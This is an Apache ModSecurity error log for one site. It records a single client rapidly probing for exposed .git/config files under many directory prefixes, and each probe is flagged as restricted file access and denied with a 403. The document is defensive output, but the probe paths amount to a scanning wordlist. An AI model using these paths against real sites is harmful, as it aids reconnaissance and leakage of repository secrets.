[Sun Nov 17 23:56:41.848737 2024] [:error] [pid 3372499] [client 179.43.189.138:55260] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zcwAAABQ"]
[Sun Nov 17 23:56:41.848993 2024] [:error] [pid 3372499] [client 179.43.189.138:55260] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zcwAAABQ"]
[Sun Nov 17 23:56:41.852161 2024] [:error] [pid 3370338] [client 179.43.189.138:55272] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /source/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZQAAAAc"]
[Sun Nov 17 23:56:41.852406 2024] [:error] [pid 3370338] [client 179.43.189.138:55272] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZQAAAAc"]
[Sun Nov 17 23:56:41.852627 2024] [:error] [pid 3370338] [client 179.43.189.138:55272] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZQAAAAc"]
[Sun Nov 17 23:56:41.853937 2024] [:error] [pid 3386431] [client 179.43.189.138:55280] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6QAAAAg"]
[Sun Nov 17 23:56:41.854113 2024] [:error] [pid 3386431] [client 179.43.189.138:55280] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6QAAAAg"]
[Sun Nov 17 23:56:41.854297 2024] [:error] [pid 3386431] [client 179.43.189.138:55280] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/css../.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6QAAAAg"]
[Sun Nov 17 23:56:41.855607 2024] [:error] [pid 3372496] [client 179.43.189.138:55290] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8gwAAABA"]
[Sun Nov 17 23:56:41.855872 2024] [:error] [pid 3372496] [client 179.43.189.138:55290] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8gwAAABA"]
[Sun Nov 17 23:56:41.856079 2024] [:error] [pid 3372496] [client 179.43.189.138:55290] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8gwAAABA"]
[Sun Nov 17 23:56:41.857268 2024] [:error] [pid 3372498] [client 179.43.189.138:55292] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /js/libs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaAAAABM"]
[Sun Nov 17 23:56:41.857437 2024] [:error] [pid 3372498] [client 179.43.189.138:55292] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaAAAABM"]
[Sun Nov 17 23:56:41.857602 2024] [:error] [pid 3372498] [client 179.43.189.138:55292] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaAAAABM"]
[Sun Nov 17 23:56:41.863683 2024] [:error] [pid 3372502] [client 179.43.189.138:55296] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRMwAAABc"]
[Sun Nov 17 23:56:41.863865 2024] [:error] [pid 3372502] [client 179.43.189.138:55296] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRMwAAABc"]
[Sun Nov 17 23:56:41.864049 2024] [:error] [pid 3372502] [client 179.43.189.138:55296] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRMwAAABc"]
[Sun Nov 17 23:56:41.864229 2024] [:error] [pid 3372500] [client 179.43.189.138:55316] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IAAAABU"]
[Sun Nov 17 23:56:41.864405 2024] [:error] [pid 3372500] [client 179.43.189.138:55316] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IAAAABU"]
[Sun Nov 17 23:56:41.864535 2024] [:error] [pid 3372500] [client 179.43.189.138:55316] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/img../.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IAAAABU"]
[Sun Nov 17 23:56:41.866341 2024] [:error] [pid 3386427] [client 179.43.189.138:55308] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLgAAAAI"]
[Sun Nov 17 23:56:41.866587 2024] [:error] [pid 3386427] [client 179.43.189.138:55308] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLgAAAAI"]
[Sun Nov 17 23:56:41.866761 2024] [:error] [pid 3386427] [client 179.43.189.138:55308] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLgAAAAI"]
[Sun Nov 17 23:56:41.868755 2024] [:error] [pid 3368396] [client 179.43.189.138:55320] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICQAAAAU"]
[Sun Nov 17 23:56:41.868942 2024] [:error] [pid 3368396] [client 179.43.189.138:55320] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICQAAAAU"]
[Sun Nov 17 23:56:41.869107 2024] [:error] [pid 3368396] [client 179.43.189.138:55320] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/images../.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICQAAAAU"]
[Sun Nov 17 23:56:41.877204 2024] [:error] [pid 3372501] [client 179.43.189.138:55334] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /template/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cgAAABY"]
[Sun Nov 17 23:56:41.877379 2024] [:error] [pid 3372501] [client 179.43.189.138:55334] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cgAAABY"]
[Sun Nov 17 23:56:41.877541 2024] [:error] [pid 3372501] [client 179.43.189.138:55334] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cgAAABY"]
[Sun Nov 17 23:56:41.881852 2024] [:error] [pid 3372499] [client 179.43.189.138:55342] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /templates/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdAAAABQ"]
[Sun Nov 17 23:56:41.882034 2024] [:error] [pid 3370338] [client 179.43.189.138:55348] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /views/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/views/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZgAAAAc"]
[Sun Nov 17 23:56:41.882113 2024] [:error] [pid 3372499] [client 179.43.189.138:55342] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdAAAABQ"]
[Sun Nov 17 23:56:41.882213 2024] [:error] [pid 3370338] [client 179.43.189.138:55348] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/views/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZgAAAAc"]
[Sun Nov 17 23:56:41.882368 2024] [:error] [pid 3372499] [client 179.43.189.138:55342] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdAAAABQ"]
[Sun Nov 17 23:56:41.882403 2024] [:error] [pid 3370338] [client 179.43.189.138:55348] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/views/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZgAAAAc"]
[Sun Nov 17 23:56:41.886101 2024] [:error] [pid 3386431] [client 179.43.189.138:55354] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /layout/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/layout/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6gAAAAg"]
[Sun Nov 17 23:56:41.886411 2024] [:error] [pid 3386431] [client 179.43.189.138:55354] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/layout/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6gAAAAg"]
[Sun Nov 17 23:56:41.886626 2024] [:error] [pid 3386431] [client 179.43.189.138:55354] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/layout/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6gAAAAg"]
[Sun Nov 17 23:56:41.887275 2024] [:error] [pid 3372496] [client 179.43.189.138:55370] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /media/uploads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hAAAABA"]
[Sun Nov 17 23:56:41.887444 2024] [:error] [pid 3372496] [client 179.43.189.138:55370] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hAAAABA"]
[Sun Nov 17 23:56:41.887622 2024] [:error] [pid 3372496] [client 179.43.189.138:55370] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hAAAABA"]
